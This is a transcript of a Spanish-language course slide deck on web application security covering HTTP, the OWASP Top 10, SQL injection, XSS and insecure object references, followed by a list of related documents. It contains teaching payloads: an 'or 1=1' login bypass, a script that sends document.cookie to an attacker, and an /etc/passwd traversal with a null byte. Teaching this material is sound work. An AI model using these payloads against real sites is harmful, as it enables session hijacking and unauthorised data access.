SEGURIDAD WEB. Cristian Cappo
|
|
- Alfonso Belmonte Ortíz
- hace 8 años
- Vistas:
Transcripción
1 SEGURIDAD WEB Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py) NIDTEC - Núcleo de Investigación y Desarrollo Tecnológico - FPUNA
2 Contenido Aplicaciones web. Características y funcionamiento. Vulnerabilidades en las aplicaciones web y ataques Vulnerabilidades en navegadores (parte II, otra presentación) Conclusiones 2
3 1. Aplicaciones web. Características y funcionamiento 3
4 Qué es una aplicación web? Es aquella aplicación que utilizan la infraestructura web para su funcionamiento, en particular consideramos la que utiliza el protocolo HTTP (HyperText Transfer Protocol - RFC 2616) para la comunicación con sus usuarios. La web se ha convertido en el medio natural para desplegar servicios de software. Existen actualmente cerca de 874 millones de sitios web según Netcraft ( (ago/2015), en el mismo mes del se tenía 716 millones, es decir hubo un crecimiento de más de 150 millones de sitios en dos años!! Y con 34,3% de la población mundial con acceso a Internet (2400 millones de personas!!) Cuántos de estos sitios poseen al menos una aplicación web? 4
5 Beneficios de las aplicaciones web Utiliza un protocolo liviano(http) y stateless (sin conexión) El front-end es algo común en cualquier computadora o dispositivo móvil: un navegador. Actualmente, los navegadores poseen mucha funcionalidad La tecnología y los lenguajes de desarrollo de las aplicaciones son relativamente simples y fáciles de conseguir. 5
6 6
7 Funcionalidades de la aplicaciones web(2) Además de Internet, las organizaciones están adoptando este esquema para soporte de sus actividades de negocio: Aplicaciones para manejo administrativo: ejemplo software ERP. Administración de infraestructura como servidores, estaciones de trabajo, máquinas virtuales, mail & web servers, etc. Software colaborativo: workflow, documentos, etc. Aplicaciones usuales de oficina (planilla, proc. de texto, etc): Google apps, MS Office live, etc. 7
8 Arquitectura web : Esquema básico Firewall Cliente Web Servidor Web App - Web App - Web Servidor de Base de datos Tráfico HTTP Puerto 80 8
9 Arquitectura web : Funcionamiento Todas las transacciones HTTP siguen el mismo formato. Cada request(cliente) y cada response(servidor) tiene tres partes: la línea del request (que indica el método HTTP) o response, la cabecera y el cuerpo 9
10 Arquitectura web: Componentes Métodos HTTP: los principales GET y POST. Otros: HEAD, TRACE, OPTIONS, DELETE. URL (uniform resource locator): identificador único para un recurso web. El formato es el siguiente: protocol: //hostname[:port]/[path/]file?[param=value] Envío de parámetros: en el URL query string, en los cookies, en el cuerpo usando POST. Las aplicaciones pueden ser construidas con una variedad de tecnologías: Lenguajes de scripts como: PHP, VBScript, Perl, etc Plataformas de aplicaciones web : APS.NET, Java, Ruby on rails, Web servers: Apache, IIS, Oracle, NCSA, IBM, etc Base de datos: Oracle, PostgreSQL, MySQL, etc Otros componentes de back-end: sistema de archivos, servicios web, servicios de directorio, etc. 10
11 Arquitectura web Métodos HTTP básicos Método Descripción Body? GET Solicitar un documento del servidor No HEAD Solicitar solo el header del servidor No POST Enviar datos al servidor para su procesamiento Si PUT Guardar el cuerpo del request en el servidor Si TRACE OPTIONS Mostrar la traza del mensaje a través de los proxys al server Determina que métodos están habilitados en el servidor DELETE Borra un documento del servidor No No No 11
12 Arquitectura web 12
13 Arquitectura web: funcionalidad del lado cliente HTML4 y HTML5 HyperLinks Forms CSS JavaScript VBScript DOM Ajax JSON Extensiones al browser: Java applets, controles ActiveX, objetos Flash, objetos Silverlight, etc. 13
14 Arquitectura web: otras cuestiones Estado y Sesiones Esquemas de codificación (ejemplo del carácter = ) URL %3d Unicode %u003d ó \u003d HTML = ó = ó &eq; Base64 PQ== Hex 3D Acceso remoto de clientes y serialización Adobe Flex y AMF (Action Message Format) MS Silverligth and WCF (Windows Communication Foundation) Objetos java serializados 14
15 2. Vulnerabilidades en las aplicaciones web y ataques 15
16 Qué es una vulnerabilidad? Es una debilidad o hueco de seguridad en la aplicación/software que puede ser aprovechada o explotada de forma malintencionada por un atacante y violar así la seguridad del sistema, ó afectar su disponibilidad. 16
17 Porqué las aplicaciones quedan vulnerables? Falta de aplicación de una metodología que incluya a la seguridad como parte del proceso de desarrollo de software. Software Development Lifecycle SDL (Microsoft) SSE-CMM(ISO/IEC 21827) (SystemSecurityEngineering-CMM) SAMM (Software Assurance Maturity Model (OWASP) Software Security Framework (Citigal & Fortify ) 17
18 Porqué las aplicaciones quedan vulnerables? (2) Conciencia sobre seguridad poco desarrollada. Desarrollo con ajustadas restricciones de tiempo y recursos. Rápida evolución de las amenazas. Creciente demanda de nuevas funcionalidades. Ajuste de las aplicaciones en funcionamiento (o en etapas finales de desarrollo) a las nuevas tecnologías. Desarrollo personalizado. La simplicidad engañosa de las herramientas. 18
19 Ejemplo de vulnerabilidades de una aplicación utilizada usualmente Aplicación: Joomla! ( Fuente: (Secunia) Número de vulnerabilidades para Joomla! ( ): : : : : 66 Fuente : cve.mitre.org Número de vulnerabilidades para Joomla! ( ): : : : : 67 Otras fuentes de consulta de vulnerabilidades: (Symantec) osvdb.org (Open Source Vulnerability Database) ( SecurityGlobal.net) (Web Hacking Incident Database) (exclusivo de aplicaciones web) xssed.com (Vulnerabilidades XSS) (lista un poco más de vulnerabilidades XSS) Common Vulnerabilities and Exposures (CVE) Desde 1999 a 2012, más del 50% corresponde a vulnerabilidades web 19
20 Cómo evitar las vulnerabilidades? Hacer lo correcto desde el principio Pero No es posible 100% de seguridad Muchas veces utilizamos software de terceros, del que tal vez desconozcamos su calidad. Tenemos que convivir con sistemas en funcionamiento Si es posible mejorar el software, debe hacerse! Es el foco del curso Es probable que tengamos que aumentar la seguridad desde el exterior Ejemplo: Esquemas defensivos de tipo caja negra 20
21 Razones para atacar una aplicación web Ubicuidad Existencia de técnicas simples de hackeo Anonimato Pasar por alto las protecciones tradicionales (firewalls) Facilidad de código propio Seguridad inmadura Constantes cambios a las aplicaciones Dinero Cuestiones políticas 21
22 Qué componentes son atacables? Plataforma web Aplicación web Base de datos Cliente web Comunicación Disponibilidad (DoS) 22
23 Proceso del ataque Descubrir (profiling) Examinar el entorno Tipo y versión del SO, web server, web app server, etc (por ejemplo usando nmap) Examinar la aplicación Examinar la estructura, tipo de lenguaje, tipo de objetos Generar y examinar errores Encontrar información oculta Definición del target Mecanismo de login Campos de entrada Manejo de sesiones Infraestructura.. 23
24 Ataques web Firewall Cliente Web Servidor Web App - Web App - Web Servidor de Base de datos Tráfico HTTP Puerto 80 GET /login.pl?user= El firewall no puede contrarrestar ataques que vienen en el contenido de los paquetes HTTP (que es puerto abierto) 24
25 Principales ataques web Open Web Application Security Project ( Organización sin fines de lucro que se dedica a ayudar a entender y mejorar la seguridad de las aplicaciones y servicios web. Lo hace a través de varios proyectos como guías de desarrollo para diferentes lenguajes de programación, software de testing por seguridad, librerías seguras, guías de buenas prácticas, etc. Entre uno de sus proyectos se encuentra la producción de la lista de las diez vulnerabilidades más importantes de las aplicaciones web. El último reporte es del
26 OWASP top 10 (2013) ( 1. Inyección (notablemente SQL Injection). 2. Pérdida de autenticación y gestión de sesiones. 3. Secuencia de Comandos en Sitios Cruzados (XSS). 4. Referencia Directa Insegura a objetos. 5. Configuración de Seguridad Incorrecta. 6. Exposición de datos sensibles (incluye almacenamiento criptográfico inseguro) 7. Ausencia de control de acceso funciones (incluye falla de restricción de acceso a URL de 2010) 8. Falsificación de Peticiones en Sitios Cruzados (CSRF). 9. Uso de componentes con vulnerabilidades conocidas (nuevo 2013) 10. Redirecciones y reenvíos no validados. === OWASP Falla de restricción de acceso a URL de Almacenamiento criptográfico inseguro - Defectuosa configuración de seguridad 26
27 Ejemplo de ataques más comunes SQL Injection Permite a los atacantes retransmitir código a través de la aplicación web a otro sistema vía SQL. Las consecuencias: obtención de información privada, saltar el esquema de autenticación, corromper datos, ejecución de comandos del sistema operativo, etc 27
28 SQL Injection ejemplo 1 Considerar el siguiente código perl No validado $query = new CGI; $username = $query->param( username ); $password = $query->param( password ); $sql_command = select * from users where username= $username and password= $password ; $sth = $dbh->prepare($sql_command) Un atacante podría aprovechar esta vulnerabilidad agregando por ejemplo or 1=1 en el campo password de forma que la consulta quedaría: select * from users where username= juan and password= or 1=1 28
29 SQL Injection ejemplo 2 En PHP $sql = "SELECT * FROM table WHERE id = '". $_REQUEST['id ]. " "; En Java String query = "SELECT user_id FROM user_data WHERE user_name = '" + req.getparameter("userid") + "' and user_password = '" + req.getparameter("pwd") +"'"; 29
30 SQL Injection Otras palabras claves a detectar Exec XP_ Exec SP_ OpenRowSet Execute inmediate UNION SELECT INSERT DELETE UPDATE 30
31 Ejemplo de ataques comunes Secuencia de Comandos en Sitios Cruzados (XSS) La aplicación puede ser utilizada como mecanismo para transportar un ataque al usuario final con un navegador. El navegador del usuario no tiene forma de conocer que el script es malicioso Puede acceder a cookies, tokens de sesión o cualquier otra información sensible guardada en el navegador. Pueden ser de tipo reflejados o permanentes. 31
32 XSS - Ejemplo Considerar el siguiente código Java (String) page += "<input name='creditcard' type='text value='" + request.getparameter("cc") + "'>"; El atacante puede modificar el parámetro CC en el navegador '><script>document.location=' foo='+document.cookie</script>'. 32
33 XSS Reflejado - Ejemplo Usuario hace login El usuario solicita el URL malicioso al servidor El server responde con el script del atacante El atacante secuestra la sesión del usuario El script del atacante Se ejecuta en el navegador Del usuario 5 El atacante envía un URL malicioso al usuario 2 6 El navegador del usuario envía el dato al atacante
34 XSS Guardado - Ejemplo Usuario hace login El atacante envía una respuesta conteniendo un script malicioso El usuario ve la respuesta del atacante El server responde con el script del atacante El atacante secuestra la sesión del usuario El script del atacante Se ejecuta en el navegador Del usuario 5 6 El navegador del usuario envía el dato al atacante
35 Otros ataques Referencia insegura y directa a objetos Ocurre cuando un programador expone una referencia hacia un objeto interno de la aplicación tales como un archivo, directorio, registro de la base de datos, o clave como un URL o un parámetro de formulario web Ejemplo 1: <select name="language"> <option value="fr">français</option></select> require_once($_request['language ]."lang.php"); Este código puede ser atacado suministrando una cadena como../../../../etc/passwd%00 y acceder a archivos del sistema (fijarse que se inyectó el byte nulo %00 y así evitar que se añada otra cadena, lang.php en este caso) 35
36 Otros ataques Referencia insegura y directa a objetos Ejemplo 2: Un atacante puede explotar la vulnerabilidad probando con varios valores para una clave que está expuesta por la aplicación. int cartid = Integer.parseInt( request.getparameter("cartid" )); String query = "SELECT * FROM table WHERE cartid=" + cartid; 36
37 Qué hacer contra los ataques? Monitorizar Conocer que esta ocurriendo (buenas herramientas de S.O.) Detectar Conocer cuando existe un ataque (Intrusión Detection System) Prevenir Detener el ataque antes que logre su objetivo (Intrusión Prevention System) Evaluar Descubrir los problemas antes que los atacantes: Test de penetración Análisis estático/dinámico 37
38 Bibliografía D. Stuttard & M. Pinto. The Web application Hacker s Handbook, 2nd. Edition. Wiley Press M. Shema. Hacking Web Apps. Detecting and Preventing Web Application Security Problems. Syngress Press. Elsevier M. Zalewski. The tangled Web. A guide to securing Modern Web Applications
DETECCIÓN DE INTRUSIÓN POR ANOMALÍA EN APLICACIONES WEB
DETECCIÓN DE INTRUSIÓN POR ANOMALÍA EN APLICACIONES WEB Cristian Cappo (ccappo@pol.una.py) Facultad Politécnica - UNA Laboratorio de Computación Científica y Aplicada En esta presentación 1. Aplicaciones
Más detallesSECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web
Más detallesPROGRAMACIÓN PÁGINAS WEB CON PHP
PROGRAMACIÓN PÁGINAS WEB CON PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología
Más detallesCapítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN
CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR
Más detallesCapítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable
Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)
Más detallesLa utilización de las diferentes aplicaciones o servicios de Internet se lleva a cabo respondiendo al llamado modelo cliente-servidor.
Procesamiento del lado del servidor La Programación del lado del servidor es una tecnología que consiste en el procesamiento de una petición de un usuario mediante la interpretación de un script en el
Más detallesProgramación páginas web. Servidor (PHP)
Programación páginas web. Servidor (PHP) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos MySQL.
Más detallesHacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet
Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL
Más detallesXPERTO EN DISEÑO DE PÁGINAS WEB
Curso ICA de: EXPERTO EN DISEÑO DE PÁGINAS WEB Módulo 1: Program. cliente: JavaScript Estudia el lenguaje JavaScript para crear guiones o scripts que se incluyen en las páginas web y que son ejecutados
Más detallesIngeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US
Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal
Más detallesAtaques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesSeguridad WEB Inyección de código
Seguridad WEB Inyección de código Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py) NIDTEC - Núcleo de Investigación
Más detallesWeb : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team
Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.
Más detallesSesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1
Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación
Más detallesabacformacio@abacformacio.com
Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología
Más detallesUNIVERSIDAD TECNICA DE MANABI Facultad de Ciencias Informáticas Ingeniería en sistemas. SEGURIDAD INFORMATICA Tema: Mysql Injection
UNIVERSIDAD TECNICA DE MANABI Facultad de Ciencias Informáticas Ingeniería en sistemas SEGURIDAD INFORMATICA Tema: Mysql Injection Autora: Doris María Mera Mero Curso: 7mo A Fecha: Martes 30 de Julio del
Más detallesPresentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL BÁSICO
Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL BÁSICO INNOVATIVA CENTRO DE TRANSFERENCIA Y DESARROLLO TECNOLÓGICO ESPE CECAI Capacitación Virtual La mejor opción para su crecimiento profesional
Más detallesVulnerabilidades de los sistemas informáticos
Vulnerabilidades de los sistemas informáticos formador Ezequiel Llarena Borges http://youtu.be/fdhayogalv4/ 1 Responsables de las vulnerabilidades que afectan a los sistemas informáticos formador Ezequiel
Más detallesCMS JOOMLA. Características
CMS JOOMLA Joomla es un sistema gestor de contenidos dinámicos (CMS o Content Management System) que permite crear sitios web de alta interactividad, profesionalidad y eficiencia. La administración de
Más detallesAUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS
AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de
Más detallesINTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios
INTRODUCCION Tema: Protocolo de la Capa de aplicación. FTP HTTP Autor: Julio Cesar Morejon Rios Qué es FTP? FTP (File Transfer Protocol) es un protocolo de transferencia de archivos entre sistemas conectados
Más detallesCapítulo 2.- Vulnerabilidades en aplicaciones web.
Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como
Más detallesRETO HACKER DE VERANO
RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque
Más detallesServicios de Seguridad de la Información
Servicios de Seguridad de la Información Las siguientes actuaciones son medidas dirigidas a garantizar la Confidencialidad, Privacidad y Disponibilidad de los Servicios de la Información y que podemos
Más detallesGastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia
Gastón Toth gaston.toth@owasp.org Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Dónde queda OWASP Patagonia? Webapp pentesting...desde un enfoque no muy técnico Penetration testing
Más detallesSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales
Más detallesJulio Cesar Hernández García juliochg@gmail.com
CMS bajo Software Libre Julio Cesar Hernández García juliochg@gmail.com Contenido Reseña de la Web Qué son los CMS Un CMS necesita... Dentro del CMS Las dos caras del CMS Interfaz del Administrador Interfaz
Más detallesPruebas de Intrusión de Aplicación
Pruebas de Intrusión de Aplicación Enero 23, 2013 Esteban O. Farao Information Security Director CISSP, CISA, CRISC, PCIP, PCI-QSA, PCI-ASV Enterprise Risk Management, Inc. Agenda Que significa Pruebas
Más detallesPruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos?
Venezuela The Foundation http://www.owasp.org Chapter Pruebas de Seguridad en aplicaciones web segun Donde estamos... Hacia donde vamos? Edgar D. Salazar T Venezuela Chapter Leader edgar.salazar@owasp.org
Más detallesServicio de publicación de información web (HTTP)
Servicio de publicación de información web (HTTP) La Web es uno de los servicios más comunes en Internet, tanto que se ha convertido en su cara visible para la mayoría de los usuarios. Una página Web empezó
Más detallesFundamentos de programación Estudia las estructuras de control y cómo definir funciones en JavaScript.
Descripción: Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología ASP.NET y el servidor
Más detallesSesión No. 4. Contextualización INFORMÁTICA 1. Nombre: Procesador de Texto
INFORMÁTICA INFORMÁTICA 1 Sesión No. 4 Nombre: Procesador de Texto Contextualización La semana anterior revisamos los comandos que ofrece Word para el formato del texto, la configuración de la página,
Más detallesFORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB.
FORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - AUDITOR DE SEGURIDAD EN ENTORNOS WEB. MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB. MODULO II - HACKING
Más detallesModulo I. Introducción a la Programación Web. 1.1 Servidor Web.
Modulo I. Introducción a la Programación Web. 1.1 Servidor Web. Antes de analizar lo que es un servidor Web y llevara a cabo su instalación, es muy importante identificar diferentes elementos involucrados
Más detallesINTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS
INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes
Más detalles80295 Extending Microsoft Dynamics CRM 2011
80295 Extending Microsoft Dynamics CRM 2011 Introducción Este curso ofrece información detallada e interactiva en como desarrollar extensiones para Microsoft Dynamics CRM 2011, con foco en métodos de extensión
Más detallesHistoria de revisiones
Herbert Game Documentación Técnica Versión 1.4 Historia de revisiones Fecha Versión Descripción Autor 6/11/2011 1.0 Primer versión de la Documentación Técnica Hernán Albano 06/11/2011 1.1 Revisión del
Más detallesSeguridad en Administración de Redes. INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos.
Seguridad en Administración de Redes INTEGRANTES: Santa Elena Rodríguez Calzada María de los Ángeles Ramírez Ortiz Liliana Gpe. Olivares Valdovinos. Administración de Seguridad en Redes La administración
Más detallesPresentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL AVANZADO
Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL AVANZADO Tabla de contenido Programación Web PHP con MySQL Avanzado...3 Presentación del curso...3 Objetivos de aprendizaje...4 Contenidos
Más detallesOffensive State Auditoría de Aplicaciones Web
Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4
Más detallesCurso de Programación PHP
Curso de Programación PHP Presentación : PHP es el lenguaje de programación más usado en los servidores de Internet debido a su potencia, velocidad de ejecución y simplicidad que lo caracterizan. Este
Más detallesServidores Web E2B2C. Leandro Radusky Esteban Lanzarotti. Nov 2014
Servidores Web E2B2C Leandro Radusky Esteban Lanzarotti Nov 2014 Agenda Mañana HTTP: Arquitectura Cliente/Servidor: introducción teórica. Elementos de una página web: HTML, JavaScript y CSS básicos. python-bottle:
Más detallesEstándares para el Uso de Herramientas de Desarrollo y Plataformas de Aplicaciones Web
Secretaría de Planificación Estratégica Oficina de Informática Estándares para el Uso de Herramientas de Desarrollo y Plataformas de Aplicaciones Web VERSIÓN 4 Julio 2009 Índice 1. Generalidades... 3 1.1
Más detallesWeb: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen
Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.
Más detallesCAPÍTULO 3 VISUAL BASIC
CAPÍTULO 3 VISUAL BASIC 3.1 Visual Basic Microsoft Visual Basic es la actual y mejor representación del viejo lenguaje BASIC, le proporciona un sistema completo para el desarrollo de aplicaciones para
Más detallesCurso de PHP con MySQL Gratis
Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este
Más detallesVisión General de GXportal. Última actualización: 2009
Última actualización: 2009 Copyright Artech Consultores S. R. L. 1988-2009. Todos los derechos reservados. Este documento no puede ser reproducido en cualquier medio sin el consentimiento explícito de
Más detallesObjetivo: Introducción conceptual y aplicación básica de los lenguajes del lado del servidor.
Sesión 03: Lenguajes web del servidor Competencias a Conseguir: - Conocer el entorno de trabajo a nivel de servidores web. - Instalación del localhost (Servidor Local). - Repaso general de PHP y ejercicios
Más detallesLENGUAJES DE PROGRAMACIÓN WEB (PHP1, HTML52)
LENGUAJES DE PROGRAMACIÓN WEB (PHP1, HTML52) LENGUAJES DE PROGRAMACIÓN WEB (PHP, HTML5) 1 Sesión No. 1 Nombre: Arquitectura Objetivo: Conocer cómo funciona y se planifica una aplicación web Contextualización
Más detallesProgramación páginas web con ASP.NET 3.5 (C#)
Horas de teoría: 40 Horas de práctica: 40 Programación páginas web con ASP.NET 3.5 (C#) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript
Más detallesGuía de Apoyo Project Web Access. (Jefe de Proyectos)
Guía de Apoyo Project Web Access (Jefe de Proyectos) 1 ÍNDICE Contenido INTRODUCCIÓN... 3 CAPITULO I: ELEMENTOS INICIALES DE PROJECT WEB ACCESS... 4 Configuración General... 4 Área de Trabajo del Proyecto...
Más detallesJAVA EE 5. Arquitectura, conceptos y ejemplos.
JAVA EE 5. Arquitectura, conceptos y ejemplos. INTRODUCCIÓN. MODELO DE LA APLICACIÓN JEE5. El modelo de aplicación Java EE define una arquitectura para implementar servicios como lo hacen las aplicaciones
Más detallesCrear un servidor Web en IIS
Crear un servidor Web en IIS Qué es un servidor web? Un servidor web es un programa que se ejecuta continuamente en un computador, manteniéndose a la espera de peticiones de ejecución que le hará un cliente
Más detallesRequisitos de control de proveedores externos
Requisitos de control de proveedores externos Ciberseguridad Para proveedores clasificados como de bajo riesgo de ciberdelito 1. Protección de activos y configuración de sistemas Los Datos de Barclays,
Más detallesCORPORACIÓN MEXICANA DE INVESTIGACIÓN EN MATERIALES, S.A. DE CV
Página 1 de 6 1. OBJETIVO El presente documento tiene la finalidad de citar los beneficios de la migración de la herramienta de análisis de riesgo, mantenimiento e inspección que en lo sucesivo se denominará
Más detallesPDF created with pdffactory Pro trial version www.pdffactory.com
Este libro está diseñado y escrito para aquellas personas que, conociendo HTML y JavaScript, desean dar un salto cuantioso en la creación de sitios web, con la programación dinámica en el lado del servidor.
Más detallesDirectiva 005-2004-PCM/SG Directiva de seguridad ante la presencia de virus informático en la Presidencia del Consejo de Ministros
Directiva 005-2004-PCM/SG Directiva de seguridad ante la presencia de virus informático en la Presidencia del Consejo de Ministros 2004 I HOJA DE INFORMACION GENERAL CONTROL DOCUMENTAL: PROCEDIMIENTO:
Más detallesDesarrollo y servicios web
Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Fin tutorial HTML 2. Nombres de dominio 3. URLs 3 Sesión 4. Método GET - POST Qué haremos hoy? 1. Tipos de solicitudes
Más detallesCircular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web
ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501
Más detallesCapítulo 5. Cliente-Servidor.
Capítulo 5. Cliente-Servidor. 5.1 Introducción En este capítulo hablaremos acerca de la arquitectura Cliente-Servidor, ya que para nuestra aplicación utilizamos ésta arquitectura al convertir en un servidor
Más detallesConstruyendo una Intranet colaborativa para PyMES con SharePoint 2010
Construyendo una Intranet colaborativa para PyMES con SharePoint 2010 Descripción Microsoft SharePoint, también conocido como Microsoft SharePoint Products and Technologies, es una plataforma de colaboración
Más detallesVÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso
VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security
Más detallesBeneficios estratégicos para su organización. Beneficios. Características V.2.0907
Herramienta de inventario que automatiza el registro de activos informáticos en detalle y reporta cualquier cambio de hardware o software mediante la generación de alarmas. Beneficios Información actualizada
Más detallesManual de Usuario: Servidor Cloud y Servidor Cloud Gestionado
Manual de Usuario: Servidor Cloud y Servidor Cloud Gestionado Versión 2.0 1. Contenidos Guía de Inicio 1 Qué es Servidor Cloud?... 3 2 Acceso al panel de control... 3 3 Acceso al Servidor Cloud... 5 4
Más detallesMANUAL DE INSTALACIÓN DEL COMPONENTE WEBSIGNER ACTIVEX. Versión 4.0
MANUAL DE INSTALACIÓN DEL COMPONENTE WEBSIGNER ACTIVEX Versión 4.0 1 Control Versión 1.0 Fecha: 01-07-2011 Modificaciones: Primera versión. Versión 2.0 Fecha: 22-09-2011 Modificaciones: Adaptado a websigner
Más detallesCONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su
Más detallesdesarrollo. Dentro del desarrollo de la tesis el proceso de modelado del sistema fue hecho con el
Capitulo II. Análisis de herramientas y tecnologías de desarrollo. Dentro del desarrollo de la tesis el proceso de modelado del sistema fue hecho con el lenguaje de Modelo de Objetos llamado UML (Unified
Más detallesPROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP
PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP OBJETIVOS Estudiar la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos
Más detallesContenido QUÉ ES SERVIDOR CLOUD?... 3 ACCESO AL SERVIDOR CLOUD... 3 ADMINISTRACIÓN DEL SISTEMA... 6
Manual de Usuario "Servidor Cloud" Windows server 2012 Contenido QUÉ ES SERVIDOR CLOUD?... 3 ACCESO AL SERVIDOR CLOUD... 3 ADMINISTRACIÓN DEL SISTEMA... 6 Gestión de Usuarios... 7 Usuarios de Acceso Remoto...
Más detallesBanco de la República Bogotá D. C., Colombia
